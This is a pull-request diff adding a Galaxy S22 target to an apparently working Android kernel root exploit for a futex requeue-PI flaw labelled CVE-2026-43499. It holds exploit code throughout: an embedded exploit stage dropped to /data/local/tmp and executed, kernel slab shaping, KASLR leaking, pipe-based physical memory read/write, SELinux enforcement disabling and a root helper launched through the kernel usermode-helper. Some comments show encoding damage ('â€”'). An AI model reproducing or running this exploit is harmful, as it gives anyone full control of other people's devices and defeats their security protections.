### PR TITLE
Add S901USQU2BVK1 target (Galaxy S22 SM-S901U, 5.10.81) + CVE43499_ROOT_HELPER support

### DIFF
--- a/src/root.c
+++ b/src/root.c
@@ -1,4 +1,4 @@
-#include "common.h"
+﻿#include "common.h"
 
 #include <stdlib.h>
 #include <sys/un.h>
@@ -109,13 +109,20 @@ static int root_socket_ready(void) {
 }
 
 static int install_workqueue_umh_root(int fd) {
+  /* RMG app compatibility: the app stages the helper wherever it can and
+   * passes the absolute path via CVE43499_ROOT_HELPER (InstallViewModel
+   * shizukuEnvironment).  Fall back to the compiled-in default for plain
+   * adb usage where /data/local/tmp is populated by hand. */
+  const char *helper_env = getenv("CVE43499_ROOT_HELPER");
+  const char *helper_path =
+      (helper_env && *helper_env) ? helper_env : ROOT_UMH_PATH;
   uintptr_t selinux_addr = data_addr(SELINUX_ENFORCING);
   uint8_t permissive = 0;
   uintptr_t fake_work_addr = page_base + ROOT_UMH_WORK_OFF;
   uintptr_t umh_data_addr = page_base + ROOT_UMH_DATA_OFF;
   struct umh_kernel_data umh_data;
   memset(&umh_data, 0, sizeof(umh_data));
-  snprintf(umh_data.path, sizeof(umh_data.path), "%s", ROOT_UMH_PATH);
+  snprintf(umh_data.path, sizeof(umh_data.path), "%s", helper_path);
   snprintf(umh_data.arg, sizeof(umh_data.arg), "%s", "--umh");
   uintptr_t completion_addr =
       umh_data_addr + offsetof(struct umh_kernel_data, completion);
@@ -143,17 +150,17 @@ static int install_workqueue_umh_root(int fd) {
    * Split the causes up front: (a) helper missing or not executable by the
    * kernel umh context -> the stat/X_OK log; (b) SELinux still enforcing ->
    * the enforcing-byte readback.  The byte must be selinux_state.enforcing
-   * (target.h) — the old selinux_enforcing_boot offset was a write that
+   * (target.h) â€” the old selinux_enforcing_boot offset was a write that
    * silently changed nothing. */
   {
     struct stat st;
-    if (stat(ROOT_UMH_PATH, &st) != 0) {
+    if (stat(helper_path, &st) != 0) {
       pr_warning("root umh helper stat failed errno=%d (%s)\n", errno,
-                 ROOT_UMH_PATH);
+                 helper_path);
     } else {
       pr_info("root umh helper mode=%o uid=%u gid=%u x_ok=%d\n",
               st.st_mode & 07777, st.st_uid, st.st_gid,
-              access(ROOT_UMH_PATH, X_OK) == 0);
+              access(helper_path, X_OK) == 0);
     }
   }
 
@@ -168,7 +175,7 @@ static int install_workqueue_umh_root(int fd) {
   kernel_read_data(fd, selinux_addr, &enf_after, sizeof(enf_after));
   pr_info("root umh selinux enforcing byte %u -> %u (addr=%016zx)%s\n",
           enf_before, enf_after, selinux_addr,
-          enf_after ? " — STILL ENFORCING" : "");
+          enf_after ? " â€” STILL ENFORCING" : "");
 
   uintptr_t wq_slot = data_addr(SYSTEM_UNBOUND_WQ);
   uintptr_t wq = root_read64(fd, wq_slot);

--- a/src/root.c
+++ b/src/root.c
@@ -45,11 +45,17 @@ _Static_assert(sizeof(struct umh_completion) == 32, "completion layout");
 
 static int root_read_data(
     int fd, uintptr_t target, void *data, size_t len) {
+  if (cve_temp_root_mode()) {
+    return configfs_read_once(fd, target, data, len) == (ssize_t)len;
+  }
   return pipe_phys_read_data(fd, target, data, len);
 }
 
 static int root_write_data(
     int fd, uintptr_t target, const void *data, size_t len) {
+  if (cve_temp_root_mode()) {
+    return configfs_write_once(fd, target, data, len) == (ssize_t)len;
+  }
   return pipe_phys_write_data(fd, target, data, len);
 }
 

--- a/src/targets/S901USQU2BVK1/api.c
+++ b/src/targets/S901USQU2BVK1/api.c
@@ -1,0 +1,138 @@
+/*
+ * api.c — launcher for the embedded 32-bit CVE-2026-43499 stage.
+ *
+ * Provides:
+ *   int exp_stack_once(uint64_t *buffer);
+ *
+ * The caller prepares a 16-word (128-byte) payload buffer and this
+ * function hands it to the embedded armeabi-v7a binary:
+ *
+ *   1. install_embedded_exp64() writes the embedded binary to a
+ *      guest-writable path (once per process);
+ *   2. the buffer is stored in an inheritable memfd (no temp files);
+ *   3. the child execve()s the 32-bit stage with the memfd number as
+ *      argv[1] and the 64-bit side waits for it to finish.
+ *
+ * Returns the child's exit status, -1 on setup error, -2 if the
+ * embedded binary could not be installed/exec'd.
+ */
+
+#include "common.h"
+
+/* Embedded 32-bit stage (see src/exp64_blob.S). */
+extern const char embedded_exp64_start[];
+extern const char embedded_exp64_end[];
+
+/* Payload size: 16 uint64_t words (see src/exp64/main.c). */
+#define EXP_BUFFER_BYTES 128
+
+static const char *exp64_local_path(void) {
+  static char path[256];
+  if (!path[0]) {
+    if (access("/data/local/tmp", W_OK) == 0) {
+      snprintf(path, sizeof(path), "/data/local/tmp/cve-exp64");
+    } else {
+      snprintf(path, sizeof(path), "/tmp/cve-exp64");
+    }
+  }
+  return path;
+}
+
+/*
+ * install_embedded_exp64 — drop the embedded armeabi-v7a exploit stage
+ * to a guest-writable path so exp_stack_once() can execve() it.
+ */
+int install_embedded_exp64(void) {
+  static int installed;
+  if (installed) {
+    return 1;
+  }
+
+  const char *dest = exp64_local_path();
+  size_t size = (size_t)(embedded_exp64_end - embedded_exp64_start);
+  int fd = open(dest, O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC, 0755);
+  if (fd < 0) {
+    pr_warning("install_embedded_exp64: open %s errno=%d\n", dest, errno);
+    return 0;
+  }
+  size_t off = 0;
+  while (off < size) {
+    ssize_t n = write(fd, embedded_exp64_start + off, size - off);
+    if (n <= 0) {
+      pr_warning("install_embedded_exp64: write errno=%d\n", errno);
+      close(fd);
+      return 0;
+    }
+    off += (size_t)n;
+  }
+  close(fd);
+  chmod(dest, 0755);
+  installed = 1;
+  pr_info("install_embedded_exp64: %s (%zu bytes)\n", dest, size);
+  return 1;
+}
+
+int exp_stack_once(uint64_t *buffer) {
+  if (!buffer) {
+    pr_warning("exp_stack_once: NULL buffer\n");
+    return -1;
+  }
+
+  if (!install_embedded_exp64()) {
+    pr_warning("exp_stack_once: embedded exp64 install failed errno=%d\n",
+               errno);
+    return -2;
+  }
+
+  /* Inheritable by default (no MFD_CLOEXEC): the exec'd child reads it. */
+  int mfd = (int)syscall(__NR_memfd_create, "exp_buf", 0);
+  if (mfd < 0) {
+    pr_warning("exp_stack_once: memfd_create errno=%d\n", errno);
+    return -1;
+  }
+  ssize_t written = write(mfd, buffer, EXP_BUFFER_BYTES);
+  if (written != EXP_BUFFER_BYTES) {
+    pr_warning("exp_stack_once: memfd write %zd errno=%d\n",
+               written, errno);
+    close(mfd);
+    return -1;
+  }
+
+  pid_t pid = fork();
+  if (pid < 0) {
+    pr_warning("exp_stack_once: fork errno=%d\n", errno);
+    close(mfd);
+    return -1;
+  }
+
+  if (pid == 0) {
+    char fd_arg[16];
+    const char *path = exp64_local_path();
+    snprintf(fd_arg, sizeof(fd_arg), "%d", mfd);
+    execl(path, path, fd_arg, (char *)NULL);
+    /* execl only returns on error. */
+    pr_warning("exp_stack_once: execl errno=%d\n", errno);
+    _exit(127);
+  }
+
+  int status;
+  while (waitpid(pid, &status, 0) < 0 && errno == EINTR) {
+  }
+  close(mfd);
+
+  if (WIFEXITED(status)) {
+    int exit_code = WEXITSTATUS(status);
+    if (exit_code == 127) {
+      pr_warning("exp_stack_once: executable not found at %s\n",
+                 exp64_local_path());
+      return -2;
+    }
+    return exit_code;
+  }
+
+  if (WIFSIGNALED(status)) {
+    pr_warning("exp_stack_once: child killed by signal %d\n",
+               WTERMSIG(status));
+  }
+  return -1;
+}

--- a/src/targets/S901USQU2BVK1/common.h
+++ b/src/targets/S901USQU2BVK1/common.h
@@ -1,0 +1,408 @@
+#ifndef COMMON_H
+#define COMMON_H
+
+#define _GNU_SOURCE
+
+#include "offset.h"
+
+#define PAGE_SHIFT 12
+#define PAGE_SIZE (1UL << PAGE_SHIFT)
+#define KS_PAGE_SIZE 4096
+#define KS_PAGE_MASK 0xfffULL
+
+#include <dirent.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/futex.h>
+#include <linux/memfd.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdatomic.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/prctl.h>
+#include <sys/resource.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <unistd.h>
+
+#include "utils.h"
+
+#define KERNEL_PAGE_SETUP_ATTEMPTS 6
+#define SLIDE_KERNEL_PAGE_SETUP_ATTEMPTS 12
+#define FOPS_KERNEL_PAGE_SETUP_ATTEMPTS 72
+#ifndef SKB_DATA_DELTA
+#define SKB_DATA_DELTA (-0xe80LL)
+#endif
+
+#define ASHMEM_NAME_LEN 256
+#define __ASHMEMIOC 0x77
+#define ASHMEM_SET_NAME _IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN])
+
+#ifndef MM_STRUCT_SZ
+#define MM_STRUCT_SZ 0x500
+#endif
+#ifndef MM_ORDER
+#define MM_ORDER 3
+#endif
+#ifndef MM_PARTIALS
+#define MM_PARTIALS 5
+#endif
+#define CORE 0
+#ifndef KSNITCH_COLLISIONS
+#define KSNITCH_COLLISIONS 4
+#endif
+
+#define ORDER3_SIZE (PAGE_SIZE << MM_ORDER)
+#define PIPE_CANDIDATE_PAGES 8
+#define SKB_SEND_SIZE (ORDER3_SIZE * 2)
+#define SKB_RECLAIM_SENDS 32
+#define SKB_RECLAIM_PAIRS 8
+#define FOPS_TABLE_OFF FOPS_OFF
+#define SKB_FRAG_BIAS 0
+
+#define FAKE_TASK_PRIO 120
+#ifndef FAKE_WAITER_PRIO
+#define FAKE_WAITER_PRIO 130
+#endif
+#ifndef SLIDE_FAKE_WAITER_PRIO
+#define SLIDE_FAKE_WAITER_PRIO FAKE_WAITER_PRIO
+#endif
+#define ASHMEM_NAME_PREFIX_LEN 11
+#define ASHMEM_PREFIX_COUNT 0x6d6873612f766564ULL
+
+#define KMALLOC_SHIFT_HIGH (PAGE_SHIFT + 1)
+#define KMALLOC_BUCKETS (KMALLOC_SHIFT_HIGH + 1)
+#define KMALLOC_NORMAL_TYPE 0
+#define KMALLOC_CGROUP_TYPE 2
+#define KMALLOC_PIPE_INDEX 11
+#define KMALLOC_CACHE_TYPES 4
+#define KMALLOC_CACHE_SLOTS (KMALLOC_CACHE_TYPES * KMALLOC_BUCKETS)
+#define KMALLOC_CACHE_SLOT(type, index) \
+  (KMALLOC_CACHES + ((type) * KMALLOC_BUCKETS + (index)) * 8)
+#define KMALLOC_CGROUP_PIPE_SLOT \
+  KMALLOC_CACHE_SLOT(KMALLOC_CGROUP_TYPE, KMALLOC_PIPE_INDEX)
+#define KMALLOC_PIPE_OBJ_SIZE 0x800
+
+#define DIRECT_MAP_PAGES ((DIRECT_MAP_END - DIRECT_MAP_BASE) >> PAGE_SHIFT)
+#define VMEMMAP_END (VMEMMAP_START + DIRECT_MAP_PAGES * STRUCT_PAGE_SIZE)
+
+#define PIPE_OBJECT_SIZE KMALLOC_PIPE_OBJ_SIZE
+#define PIPE_SCAN_CHUNK 0x400
+#define PIPE_OBJS_PER_SLAB 16
+#define PIPE_SLAB_SIZE (PIPE_OBJECT_SIZE * PIPE_OBJS_PER_SLAB)
+#define PIPE_MIN_PARTIAL 5
+#define PIPE_CPU_PARTIAL 2
+#define PIPE_DRAIN_SLABS 15
+#define PIPE_RECLAIM_SLABS 15
+#define PIPE_PARTIAL_GROUPS \
+  ((PIPE_MIN_PARTIAL + PIPE_CPU_PARTIAL - 1) / PIPE_CPU_PARTIAL)
+#define PIPE_N_SLABS (PIPE_PARTIAL_GROUPS * PIPE_CPU_PARTIAL)
+#define PIPE_C_SLABS PIPE_CPU_PARTIAL
+#define PIPE_E_SLABS 2
+#define PIPE_N_COUNT (PIPE_N_SLABS * PIPE_OBJS_PER_SLAB)
+#define PIPE_C_COUNT (PIPE_C_SLABS * PIPE_OBJS_PER_SLAB)
+#define PIPE_E_COUNT (PIPE_E_SLABS * PIPE_OBJS_PER_SLAB)
+#define PIPE_DRAIN (PIPE_OBJS_PER_SLAB * PIPE_DRAIN_SLABS)
+#define PIPE_RECLAIM (PIPE_OBJS_PER_SLAB * PIPE_RECLAIM_SLABS)
+#define PIPE_MAX_ATTEMPTS 12
+
+#define P0_KERNEL_PHYS_DELTA (P0_KERNEL_PHYS_LOAD - P0_PHYS_OFFSET)
+#define P0_DATA_ALIAS_CONST(image_addr) \
+  (P0_PAGE_OFFSET | ((image_addr) - KIMAGE_TEXT_BASE + P0_KERNEL_PHYS_DELTA))
+
+#define CONSUMER_CORE (CORE + 1)
+#define CONSUMER_MAX_CALLS 64
+#define PSELECT_ROUTE_NFDS 320
+#define PSELECT_CONSUMER_NICE 18  /* must differ from waiter's default nice (19 on this kernel)
+                                     to force priority change → __sched_setscheduler → rt_mutex_adjust_pi */
+#define PSELECT_CONSUMER_BURST_CALLS 16
+#ifndef PSELECT_ENTER_DELAY_USEC
+#define PSELECT_ENTER_DELAY_USEC 50000
+#endif
+#ifndef SLIDE_WAITER_WAKE_STATE
+#define SLIDE_WAITER_WAKE_STATE 3
+#endif
+#ifndef SLIDE_LOCK_OWNER_VALUE
+#define SLIDE_LOCK_OWNER_VALUE 0ULL
+#endif
+#define PSELECT_TIMEOUT_SEC 1
+#ifndef ROUTE_WAIT_SECONDS
+#define ROUTE_WAIT_SECONDS 8
+#endif
+#define SLIDE_NFULNL_LOGGER \
+  P0_DATA_ALIAS_CONST(SLIDE_NFULNL_LOGGER_IMAGE)
+#define SLIDE_LOGGERS_0_1 P0_DATA_ALIAS_CONST(SLIDE_LOGGERS_0_1_IMAGE)
+#define SLIDE_RANDOM_BOOT_ID_DATA \
+  P0_DATA_ALIAS_CONST(SLIDE_RANDOM_BOOT_ID_DATA_IMAGE)
+#ifndef SLIDE_WAITER_TREE_LEFT
+#define SLIDE_WAITER_TREE_LEFT SLIDE_RANDOM_BOOT_ID_DATA
+#endif
+#define SLIDE_INIT_TASK P0_DATA_ALIAS_CONST(SLIDE_INIT_TASK_IMAGE)
+#ifndef SLIDE_WAITER_TASK
+#define SLIDE_WAITER_TASK SLIDE_INIT_TASK
+#endif
+#define SLIDE_ROOT_TASK_GROUP \
+  P0_DATA_ALIAS_CONST(SLIDE_ROOT_TASK_GROUP_IMAGE)
+#define SLIDE_SYSCTL_BOOTID P0_DATA_ALIAS_CONST(SLIDE_SYSCTL_BOOTID_IMAGE)
+
+#define PAGE_PAYLOAD_FOPS 0
+#define PAGE_PAYLOAD_SLIDE 1
+/* Quest3/exp64 route: fake_lock zeroed, fake_task detached, write value in
+ * the stamped waiter's own tree_entry (rb_set_parent write at dequeue). */
+#define PAGE_PAYLOAD_exp64 2
+
+struct kernelsnitch_shared_state;
+
+struct local_sched_attr {
+  uint32_t size;
+  uint32_t sched_policy;
+  uint64_t sched_flags;
+  int32_t sched_nice;
+  uint32_t sched_priority;
+  uint64_t sched_runtime;
+  uint64_t sched_deadline;
+  uint64_t sched_period;
+};
+
+struct mm_ctx {
+  size_t mm_cnt;
+  pid_t *childs;
+  int *memfds;
+};
+
+struct user_pipe_buffer {
+  uint64_t page;
+  uint32_t offset;
+  uint32_t len;
+  uint64_t ops;
+  uint32_t flags;
+  uint32_t pad;
+  uint64_t private;
+};
+
+extern pid_t pipe_prepare_child;
+extern uintptr_t page_base;
+extern uintptr_t fake_lock;
+extern uintptr_t fake_w0;
+extern uintptr_t fake_task;
+extern uintptr_t fake_parent;
+extern uintptr_t fake_right;
+extern uintptr_t fake_left;
+extern uintptr_t fake_fops;
+extern uintptr_t binwrite_target;
+
+extern uint32_t f_wait;
+extern uint32_t f_pi_target;
+extern uint32_t f_pi_chain;
+extern atomic_int waiter_ready;
+extern atomic_int waiter_waiting;
+extern atomic_int owner_started;
+extern atomic_int owner_chain_done;
+extern atomic_int route_done;
+extern atomic_int waiter_tid;
+extern atomic_int punch_consume_go;
+extern atomic_int punch_consume_stop;
+extern atomic_int consumer_calls;
+extern atomic_int consumer_success;
+extern atomic_int main_route_delay_usec;
+extern atomic_int cfi_stage_done;
+extern atomic_int pipe_prepare_request;
+extern atomic_int pipe_prepare_done;
+extern ssize_t cfi_write_ret;
+extern ssize_t cfi_read_ret;
+extern ssize_t cfi_read_slot_ret;
+extern ssize_t cfi_owner_ret;
+extern ssize_t cfi_restore_ret;
+extern uint64_t fops_before;
+extern uint64_t fops_after;
+extern int root_child_done;
+extern char ashmem_path[256];
+extern uint32_t root_uid_before;
+extern uint32_t root_uid_after;
+extern int cfi_attempts;
+extern int pipe_stage_attempts;
+extern int cfi_dirty_seen;
+extern int cfi_last_step;
+extern int cfi_last_errno;
+extern uint64_t kmalloc_pipe_cache;
+extern uint64_t kmalloc_normal_1k_cache;
+extern uint64_t kmalloc_normal_2k_cache;
+extern uint64_t kmalloc_cgroup_1k_cache;
+extern uint64_t kmalloc_cgroup_2k_cache;
+extern uint64_t candidate_slab_cache;
+extern int pipe_cache_gate_ok;
+extern int pipe_cache_page_index;
+extern int pipe_cache_slot_hit;
+extern uint64_t pipe_page_slab_cache[PIPE_CANDIDATE_PAGES];
+extern uint32_t pipe_page_type[PIPE_CANDIDATE_PAGES];
+extern uintptr_t pipebuf_page_base;
+extern uintptr_t pipebuf_addr;
+extern int pipebuf_pipe_idx;
+extern char physrw_readback[64];
+extern char physrw_after_write[64];
+extern int physrw_read_ok;
+extern int physrw_write_ok;
+extern int pipe_scan_vmemmap;
+extern int pipe_scan_ops;
+extern int pipe_scan_len;
+extern int pipe_probe_found;
+extern uint64_t pipe_probe_page;
+extern uint64_t pipe_probe_ops;
+extern uint64_t pipe_probe_private;
+extern uint32_t pipe_probe_len;
+extern uint32_t pipe_probe_flags;
+extern uint64_t pipe_scan_first_page;
+extern uint64_t pipe_scan_first_ops;
+extern uint64_t pipe_scan_q0;
+extern uint64_t pipe_scan_q1;
+extern uint64_t pipe_scan_q2;
+extern uint64_t pipe_scan_q3;
+extern uint32_t pipe_scan_first_len;
+extern uint32_t pipe_scan_first_flags;
+extern uint64_t physrw_read64_before;
+extern uint64_t physrw_read64_after;
+extern uint64_t physrw_write64_value;
+extern int physrw_read64_ok;
+extern int physrw_write64_ok;
+extern int kaslr_done;
+extern uint64_t kaslr_base;
+extern uint64_t kaslr_slide;
+extern uint64_t slide_bootid_before;
+extern uint64_t slide_bootid_after;
+extern uint64_t slide_bootid_want;
+extern ssize_t slide_bootid_restore_ret;
+extern uintptr_t slide_p0_offset;
+extern int memfd_leak;
+extern atomic_int fake_fops_request;
+extern atomic_int fake_fops_done;
+
+int exp_stack_once(uint64_t *buffer);
+int install_embedded_exp64(void);
+int doreplacefops(void);
+
+int run_exploit(int argc, char **argv);
+void read_first_line(const char *path, char *buf, size_t len);
+void log_startup_context(void);
+void disable_rseq_for_thread(void);
+long futex_op(
+    uint32_t *uaddr, int op, uint32_t val,
+    const struct timespec *timeout, uint32_t *uaddr2, uint32_t val3);
+long sched_setattr_tid(int tid, int nice_value);
+int try_cache_ashmem_path(const char *path);
+int same_rdev_path(const char *path, dev_t rdev);
+void init_ashmem_path(void);
+int open_ashmem_device(void);
+uintptr_t p0_data_alias(uintptr_t image_addr);
+uintptr_t p0_alias_image_offset(uintptr_t data_alias);
+uintptr_t data_addr(uintptr_t image_addr);
+uintptr_t kaslr_image_addr(uintptr_t image_addr);
+uintptr_t text_addr(uintptr_t image_addr);
+uintptr_t slide_canon_addr(uintptr_t data_alias);
+uintptr_t canon_addr(uintptr_t image_addr);
+void put64(unsigned char *p, size_t off, uint64_t value);
+void put32(unsigned char *p, size_t off, uint32_t value);
+void put_fake_fops_table(unsigned char *p, size_t off);
+int try_put_blob_no_zeros(int fd, const unsigned char *blob, size_t len);
+int try_put_blob_zero_at(int fd, const unsigned char *blob, size_t pos);
+int try_set_ashmem_name_blob(int fd, const unsigned char *blob, size_t len);
+pid_t clone_child(void);
+pid_t clone_leak_child(void);
+int open_memfd(pid_t child);
+void kill_child(pid_t child);
+void close_reclaim_sockets(void);
+void setup_kernelsnitch(void);
+int kernelsnitch_collisions_ready(void);
+void run_kernelsnitch_bruteforce(void);
+uintptr_t cleanup_kernelsnitch(void);
+void close_ctx_memfds(struct mm_ctx *ctx);
+void free_ctx_storage(struct mm_ctx *ctx);
+void cleanup_page_prepare_state(void);
+int clone_memfd(void);
+void prepare_ctxs(void);
+int prepare_skb_payload(uintptr_t base, int payload_mode);
+uintptr_t prepare_kernel_page(int payload_mode);
+uintptr_t prepare_good_kernel_page(int payload_mode);
+/* Optional hooks for tracing around the SKB reclaim window only. */
+typedef void (*page_reclaim_trace_fn)(void);
+void set_page_reclaim_trace_hooks(page_reclaim_trace_fn begin,
+                                  page_reclaim_trace_fn end);
+void page_reclaim_trace_begin(void);
+void page_reclaim_trace_end(void);
+extern int last_skb_reclaim_sent;
+extern int last_skb_reclaim_want;
+extern size_t last_skb_send_size;
+extern uintptr_t last_leaked_mm;
+int verify_reclaimed_kernel_page(uintptr_t base);
+
+void fdset_put_word(fd_set *set, int word, uint64_t value);
+void open_selected_fds(
+    fd_set *in, fd_set *out, fd_set *ex, int read_fd, int write_fd);
+void prepare_pselect_fdsets(fd_set *in, fd_set *out, fd_set *ex);
+void do_pselect_fake_lock_route(void);
+
+int is_kernel_ptr(uintptr_t value);
+int is_direct_ptr(uintptr_t value);
+
+int slide_leak_kernel_base(void);
+
+ssize_t configfs_write_once(
+    int fd, uintptr_t target, const void *data, size_t len);
+ssize_t configfs_read_once(int fd, uintptr_t target, void *data, size_t len);
+int is_direct_ptr(uintptr_t value);
+uint64_t kernel_read64(int fd, uintptr_t target);
+ssize_t kernel_write_data(
+    int fd, uintptr_t target, const void *data, size_t len);
+ssize_t kernel_read_data(int fd, uintptr_t target, void *data, size_t len);
+int repair_fake_fops_llseek(int fd);
+int repair_fake_fops_read(int fd);
+int restore_slide_boot_id(int fd);
+int install_child_root(int fd);
+int try_cfi_stage(void);
+
+void init_ctx(struct mm_ctx *ctx, size_t cnt);
+void resize_pipe_slots(int pipefd[2], size_t slots);
+void make_pipe_object(int pipefd[2]);
+void alloc_pipe_object(int pipefd[2]);
+void free_pipe_object(int pipefd[2]);
+void shape_pipe_cache_once(void);
+void shape_pipe_cache(void);
+uintptr_t prepare_pipe_buffer_page_child(void);
+uintptr_t prepare_pipe_buffer_page(void);
+void reset_pipe_attempt(void);
+uintptr_t direct_to_page(uintptr_t addr);
+uintptr_t direct_to_head_page(int fd, uintptr_t addr);
+uintptr_t page_to_direct(uintptr_t page);
+uintptr_t pipe_buf_ops_addr(void);
+int pipe_cache_matches(uint64_t slab_cache);
+int pipe_reclaim_cache_gate(int fd);
+int read_pipe_slab(int fd, uintptr_t base, unsigned char *slab);
+int find_pipe_buffer(int fd, uintptr_t base);
+int pipe_phys_read(
+    int fd, int pipefd[2], uintptr_t buf_addr, uintptr_t direct_addr,
+    void *out, size_t len);
+int pipe_phys_write(
+    int fd, int pipefd[2], uintptr_t buf_addr, uintptr_t direct_addr,
+    const void *data, size_t len);
+void forge_pipe_buffers_on_page(
+    int fd, uintptr_t base, uintptr_t direct_addr, size_t len, int for_write);
+int pipe_phys_read_data(int fd, uintptr_t direct_addr, void *out, size_t len);
+int pipe_phys_write_data(
+    int fd, uintptr_t direct_addr, const void *data, size_t len);
+uint64_t pipe_read64(int fd, uintptr_t direct_addr);
+int pipe_write64(int fd, uintptr_t direct_addr, uint64_t value);
+int install_pipe_physrw(int fd);
+
+int install_android_root(int fd);
+
+#endif

--- a/src/targets/S901USQU2BVK1/common.h
+++ b/src/targets/S901USQU2BVK1/common.h
@@ -356,6 +356,9 @@ int is_direct_ptr(uintptr_t value);
 
 int slide_leak_kernel_base(void);
 
+/* BVK1 temp-root mode: skip pipe/physrw, drive umh root via CFI primitive. */
+int cve_temp_root_mode(void);
+
 ssize_t configfs_write_once(
     int fd, uintptr_t target, const void *data, size_t len);
 ssize_t configfs_read_once(int fd, uintptr_t target, void *data, size_t len);

--- a/src/targets/S901USQU2BVK1/exp64/main.c
+++ b/src/targets/S901USQU2BVK1/exp64/main.c
@@ -1,0 +1,335 @@
+/*
+ * CVE-2026-43499 — S901W / S22, 5.10.168-android12-9-27760517-abS901WVLS4DWL3.
+ *
+ * Ported from b0q (S22 Ultra, 5.10.226).  The original exp64 binary (armeabi-v7a
+ * static PIE, execve'd by the 64-bit preload) is retired: __arm64_compat_sys_setsockopt
+ * is a ENOSYS stub on this kernel, so the 32-bit compat stamp path is dead.
+ * The waiter, stamper, owner, and consumer all run as 64-bit threads in a single
+ * process.  do_stamp_stack() calls native setsockopt (optlen=264) directly.
+ *
+ * The 64-bit futex path (__arm64_sys_futex → do_futex → futex_wait_requeue_pi)
+ * allocates rt_mutex_waiter on the waiter's kernel stack identically to the
+ * 32-bit path — the bug is in the kernel futex logic, not the ABI.
+ *
+ * Payload buffer is still passed via an inherited memfd (argv[1] = decimal fd)
+ * for consistency with the 64-bit orchestrator side:
+ *
+ *   argv[1] = decimal fd of the memfd (buffer: 16 uint64_t words = 128 bytes)
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/futex.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdatomic.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/syscall.h>
+#include <time.h>
+#include <unistd.h>
+
+#include "utils.h"
+
+#ifndef pr_debug
+#define pr_debug(fmt, ...) ((void)0)
+#endif
+
+FILE *g_logfile = NULL;
+/* ------------------------------------------------------------------ */
+/*  Constants                                                          */
+/* ------------------------------------------------------------------ */
+
+#define WAITER_WAIT_SEC     5
+/* The consumer fires with no settle delay by default
+ * (exp64_CONSUMER_DELAY_US overrides) — see consumer_thread. */
+#define WAITER_RT_PRIO      99
+#define CONSUMER_RT_PRIO    98
+
+/* Payload: 16 uint64_t words = 128 bytes, written by exp_stack_once(). */
+#define EXP_BUFFER_BYTES 128
+#define EXP_BUFFER_WORDS (EXP_BUFFER_BYTES / sizeof(uint64_t))
+
+/* ------------------------------------------------------------------ */
+/*  Shared state                                                       */
+/* ------------------------------------------------------------------ */
+
+static uint32_t f_wait;
+static uint32_t f_pi_target;
+static uint32_t f_pi_chain;
+
+static atomic_int g_waiter_tid;
+static atomic_int g_waiter_ready;
+static atomic_int g_waiter_waiting;
+static atomic_int g_owner_started;
+atomic_int g_consumer_go;
+static atomic_int g_consumer_done;
+static uint64_t g_payload_buffer[EXP_BUFFER_WORDS];
+
+/*
+ * sched_setattr ABI struct (same layout on 32-bit and 64-bit;
+ * the kernel interprets it via the .size field).
+ */
+struct local_sched_attr {
+    uint32_t size;
+    uint32_t sched_policy;
+    uint64_t sched_flags;
+    int32_t  sched_nice;
+    uint32_t sched_priority;
+    uint64_t sched_runtime;
+    uint64_t sched_deadline;
+    uint64_t sched_period;
+};
+
+static long sched_setattr_rt(int tid, int rt_prio) {
+    struct local_sched_attr attr;
+    memset(&attr, 0, sizeof(attr));
+    attr.size           = sizeof(attr);
+    attr.sched_policy   = 1 /* SCHED_FIFO */;
+    attr.sched_priority = rt_prio;
+    return syscall(__NR_sched_setattr, tid, &attr, 0);
+}
+
+void do_stamp_stack(uint64_t *buf);
+
+/* ------------------------------------------------------------------ */
+/*  Thread: waiter                                                     */
+/* ------------------------------------------------------------------ */
+
+static void *waiter_thread(void *arg __attribute__((unused))) {
+    pin_to_core(2);
+    int tid = (int)syscall(__NR_gettid);
+    atomic_store(&g_waiter_tid, tid);
+
+    /*
+     * FIFO preset is opt-in (exp64_RT=1, e.g. QEMU-root runs).  Default is
+     * the unprivileged-device path: the waiter stays in CFS.  The FIFO
+     * guards against a CFS task being tick-preempted while parked in its
+     * userspace spin — __schedule/put_prev_entity frames reuse its kernel
+     * stack and land on the stale waiter (observed under TCG: PAC-signed
+     * put_prev_entity LR in waiter->lock).  On real hardware the parked
+     * window is microseconds, and each attempt runs in a fresh child, so
+     * the residual race is covered by retries.  Must happen before any
+     * futex op: once pi_blocked_on exists, a priority change on this task
+     * would itself trigger the chain walk.
+     */
+    if (getenv("exp64_RT")) {
+        struct local_sched_attr rt = {
+            .size           = sizeof(rt),
+            .sched_policy   = 1 /* SCHED_FIFO */,
+            .sched_priority = WAITER_RT_PRIO,
+        };
+        syscall(__NR_sched_setattr, 0, &rt, 0);
+    }
+
+    /* Step 1: lock pi_chain (become PI owner of pi_chain). */
+    if (syscall(__NR_futex, &f_pi_chain, FUTEX_LOCK_PI, 0,
+                NULL, NULL, 0) != 0) {
+        pr_warning("waiter: LOCK_PI(chain) failed errno=%d\n", errno);
+        return NULL;
+    }
+
+    atomic_store(&g_waiter_ready, 1);
+
+    /* Wait for owner to lock pi_target and block on pi_chain. */
+    while (!atomic_load(&g_owner_started))
+        usleep(1000);
+
+    /* Step 2: FUTEX_WAIT_REQUEUE_PI.
+     * This allocates rt_mutex_waiter on our kernel stack and sets
+     * our ->pi_blocked_on to point at it.
+     */
+    struct timespec timeout;
+    syscall(__NR_clock_gettime, CLOCK_MONOTONIC, &timeout);
+    timeout.tv_sec += WAITER_WAIT_SEC;
+
+    atomic_store(&g_waiter_waiting, 1);
+
+    pr_info("waiter: FUTEX_WAIT_REQUEUE_PI on f_wait -> pi_target\n");
+    syscall(__NR_futex, &f_wait, FUTEX_WAIT_REQUEUE_PI, 0,
+            &timeout, &f_pi_target, 0);
+    pr_debug("waiter: returned from WRPI (errno=%d should be 110(ETIMEDOUT))\n",
+             errno);
+
+    /* Step 3: unlock pi_chain.  After this, pi_blocked_on is STILL
+     * dangling (the bug: CMP_REQUEUE_PI cleaned main's, not ours).
+     */
